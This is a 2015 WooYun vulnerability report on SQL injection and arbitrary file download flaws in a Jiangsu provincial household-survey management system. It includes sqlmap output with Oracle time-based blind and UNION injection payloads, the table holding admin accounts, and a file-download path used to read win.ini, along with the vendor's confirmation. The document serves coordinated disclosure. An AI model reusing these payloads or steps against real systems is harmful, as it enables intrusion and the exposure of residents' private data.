当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0148376

漏洞标题:江苏省调查总队城乡住户一体化调查管理系统SQL注射漏洞/任意文件下载

相关厂商:江苏省统计局

漏洞作者: 美芽

提交时间:2015-10-21 16:38

修复时间:2015-12-07 10:54

公开时间:2015-12-07 10:54

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-21: 细节已通知厂商并且等待厂商处理中
2015-10-23: 厂商已经确认,细节仅向厂商公开
2015-11-02: 细节向核心白帽子及相关领域专家公开
2015-11-12: 细节向普通白帽子公开
2015-11-22: 细节向实习白帽子公开
2015-12-07: 细节向公众公开

简要描述:

江苏省调查总队城乡住户一体化调查管理系统存在SQL注入漏洞,可导致大量市民隐私信息泄露。

详细说明:

漏洞证明:

漏洞路径:

http://**.**.**.**/nbs/rhdc_client/jsp/BeforForgetPassword_Control.jsp?logname=-1


漏洞类型:AND/OR基于时间的盲注
0x1 漏洞证明

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: logname (GET)
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: logname=-1' AND 6500=DBMS_PIPE.RECEIVE_MESSAGE(CHR(86)||CHR(89)||CHR(99)||CHR(107),5) AND 'clfe'='clfe
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: logname=-1' UNION ALL SELECT CHR(113)||CHR(98)||CHR(113)||CHR(122)||CHR(113)||CHR(99)||CHR(104)||CHR(81)||CHR(99)||CHR(70)||CHR(65)||CHR(79)||CHR(121)||CHR(75)||CHR(104)||CHR(113)||CHR(98)||CHR(113)||CHR(120)||CHR(113) FROM DUAL--
---
web application technology: JSP
back-end DBMS: Oracle
banner: 'Oracle Database 11g Enterprise Edition Release **.**.**.**.0 - 64bit Production'
sqlmap resumed the following injection point(s) from stored session:
---


0x2 和南京市住户调查信息化系统一样,管理账户信息存储在NBS数据库DSFA_USERS表中。
0x3 登录系统,便可查看江苏省的调研居民信息。

截图4.png


0x4任意文件下载漏洞

http://**.**.**.**/nbs/DownLoadServlet?fileName=&filePath=


0x5下载win.ini文件

截图3.png


修复方案:

数据过滤,防火墙加固。PS:好多弱密码,建议增强密码复杂要求。

版权声明:转载请注明来源 美芽@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-10-23 10:53

厂商回复:

CNVD确认并复现所述漏洞情况,已经转由CNCERT下发对应分中心,由其后续协调网站管理单位处置。

最新状态:

暂无